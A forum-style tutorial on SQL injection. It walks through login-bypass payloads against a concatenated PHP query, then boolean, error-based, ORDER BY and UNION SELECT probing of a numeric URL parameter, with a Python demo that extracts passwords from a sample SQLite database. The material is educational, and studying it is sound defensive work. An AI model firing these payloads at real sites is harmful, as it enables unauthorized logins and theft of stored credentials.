*** How SQLi Works ***

% Mental Mind %

This is just a short article to show you how SQL injection exploits work; it is only an overview.

* I will start with a small login exploit. First have a look at a vulnerable login statement, built by pasting the form fields straight into the query string:




Code:
$query = "SELECT * FROM users WHERE username='" . $_POST['username'] . "' AND password='" . $_POST['password'] . "'";

Suppose we know the username is "admin" but do not know the password. The first thing to try is to comment out the password check.

Comment symbols in SQL: # (MySQL only) or -- (in MySQL it must be followed by a space, so in a URL you send "-- " or "--+").

We will try the following input:

username = admin' #
password = blah

What will it do?

Ans = The SQL statement becomes:

Code:
SELECT * FROM users WHERE username='admin' # AND password='blah'

# starts a comment, so everything after it is ignored by the database.

The '#' sign comments out the password check. The statement now only checks that the username is admin, and if such a row exists the application logs you in as admin without you knowing the password.

* Next, let's try the following username and password:

Code:
username = admin
password = blah' or 1=1#

What will it do?

Ans = It turns the statement into:

Code:
SELECT * FROM users WHERE username='admin' AND password='blah' OR 1=1#'

What happened here?

The '#' comments out the trailing single quote the application appended after our input, so the query stays syntactically valid. The WHERE clause now reads:

username='admin' AND password='blah' OR 1=1

AND binds tighter than OR, so the database evaluates this as (username='admin' AND password='blah') OR 1=1. The first part is false because the password is wrong, but 1=1 is always true, so the whole condition is true for every row. The query returns all users, and most login code simply takes the first row returned and logs you in as that user.

* Another way to do the same thing is the following input:

Code:
username = admin
password = blah' OR 'A'='A

The statement becomes:

Code:
SELECT * FROM users WHERE username='admin' AND password='blah' OR 'A'='A'

No comment symbol is needed here: the trailing quote the application adds closes our 'A string, so the query is valid on any database. 'A'='A' is always true, just like 1=1.



* Extracting data

Now have a look at a vulnerable statement that takes a number instead of a string:

Code:
SELECT * FROM posts WHERE user=1

Suppose the URL is:

site.com/showprofile?user=1

To test for the vulnerability we append "or 1=1--" after "user=1" in the URL bar. The statement becomes:

Code:
SELECT * FROM posts WHERE user=1 or 1=1--

-- is another comment operator: everything after it is ignored, so whatever the application appends to the query is thrown away. Because the parameter is a number it is not wrapped in quotes, so there is no string to break out of here.
If, using

site.com/showprofile?user=1 or 1=1--

you see the data on the page change, the vulnerability test was successful.

"Data changes" means the page now shows the posts of every user instead of only user 1, because 1=1 makes the condition true for every row.

* Second vulnerability test

or 1=0--

The statement becomes:

Code:
SELECT * FROM posts WHERE user=1 or 1=0--

1=0 is always false, so "user=1 or 1=0" matches exactly the same rows as plain "user=1": the page should look identical to the normal one. If you want the query to return no posts at all, use "and 1=0--" instead, which makes the whole condition false. Comparing the three responses (normal page, all posts with the true condition, no posts with the false condition) is the boolean-based test; if they differ as expected, the test was successful.
* Once the vulnerability test is successful, send the server something it does not expect, to get information about the SQL statement from its error messages.

For example, if the server expects an integer, give it a character. Here, at

user=

the server expects an integer, e.g. user=1, user=100 and so on.

A quote character is not expected there, so if you put a ' at the end of the URL (user=1') the database chokes on the unbalanced quote and the application may print an error message like:

mysql_warning, "You have an error in your SQL syntax ...", and so on. Such a message tells you the database type and often leaks part of the query.

Then your regular commands come in, like:

order by N = used to find the number of columns in the query: increase N (order by 1, order by 2, ...) until the database returns an error; the last N that works is the column count.

union = combines the results of two different queries into a single output. Both queries must return the same number of columns, which is why the column count is found first.

Suppose with order by you got 7 columns and then an error message on 8. Then we use union select with 7 values (e.g. union select 1,2,3,4,5,6,7--) to find which columns are displayed on the page, and extract data through those. The goal of this tutorial was only to demonstrate how SQL injection works; it was just a basic demo.
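The whole numeric-parameter procedure from this section (true/false boolean test, the quote probe, order by to count columns, union select to pull data from another table) run end to end against an in-memory SQLite database. This is an added example, not code from the original article: the posts and users tables, the profile function and the payload strings are constructed here for illustration. SQLite accepts -- without a trailing space; against MySQL in a URL you would send "-- " or "--+" instead.

```python
import sqlite3


def make_site_db():
    # Constructed sample data: a posts table the profile page reads, and a
    # users table the page never shows but the injection can reach.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER, user_id INTEGER, body TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?)", [
        (1, 1, "first post by user 1"),
        (2, 1, "second post by user 1"),
        (3, 2, "post by user 2"),
    ])
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "bob", "hunter2")])
    return conn


def show_profile(conn, user_param):
    # Vulnerable profile page: the ?user= value is pasted into the query
    # unquoted, because the developer expected an integer.
    query = "SELECT id, user_id, body FROM posts WHERE user_id=" + user_param
    return conn.execute(query).fetchall()


def boolean_test(conn):
    # Row counts for: normal request, always-true, or-false (unchanged),
    # and-false (nothing). The differences are the injection signal.
    return {
        "normal": len(show_profile(conn, "1")),
        "or_true": len(show_profile(conn, "1 or 1=1--")),
        "or_false": len(show_profile(conn, "1 or 1=0--")),
        "and_false": len(show_profile(conn, "1 and 1=0--")),
    }


def quote_probe(conn):
    # Error-based detection: an unbalanced quote breaks the SQL syntax and
    # the database error text comes back (None if nothing broke).
    try:
        show_profile(conn, "1'")
        return None
    except sqlite3.OperationalError as err:
        return str(err)


def count_columns(conn, max_cols=20):
    # ORDER BY n succeeds while n <= number of selected columns, then errors.
    for n in range(1, max_cols + 1):
        try:
            show_profile(conn, "1 order by %d--" % n)
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_extract(conn, ncols):
    # user_id=-1 matches nothing, so only the UNION half is displayed. Pad
    # the second SELECT with NULLs so both halves have ncols columns.
    cols = ["username", "password"] + ["NULL"] * (ncols - 2)
    payload = "-1 union select " + ", ".join(cols) + " from users--"
    rows = show_profile(conn, payload)
    return sorted((r[0], r[1]) for r in rows)


if __name__ == "__main__":
    db = make_site_db()
    print(boolean_test(db))
    print(quote_probe(db))
    n = count_columns(db)
    print("columns:", n)
    print(union_extract(db, n))
```

The users table's credentials come out through the two displayed post columns even though the profile page never queries that table; the only thing the attacker needed was the column count from order by.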


Sorry for my bad English.

remember me in your prayers

ALLAH HAFIZ
